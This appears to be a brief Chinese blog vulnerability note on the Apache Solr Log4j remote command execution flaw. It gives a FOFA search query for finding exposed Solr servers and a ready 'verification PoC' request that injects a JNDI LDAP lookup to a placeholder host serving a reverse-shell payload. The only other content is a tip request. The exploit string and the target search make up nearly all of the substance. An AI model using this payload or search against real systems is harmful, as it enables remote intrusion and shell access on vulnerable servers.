Apache Solr Log4j组件 远程命令执行漏洞,详情略
Apache Solr
<a-button href="https://fofa.info/result?qbase64=YXBwPSJBUEFDSEUtU29sciI%3D">FOFA: app="APACHE-Solr"</a-button>
</a-checkbox>
登录页面
验证POC
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!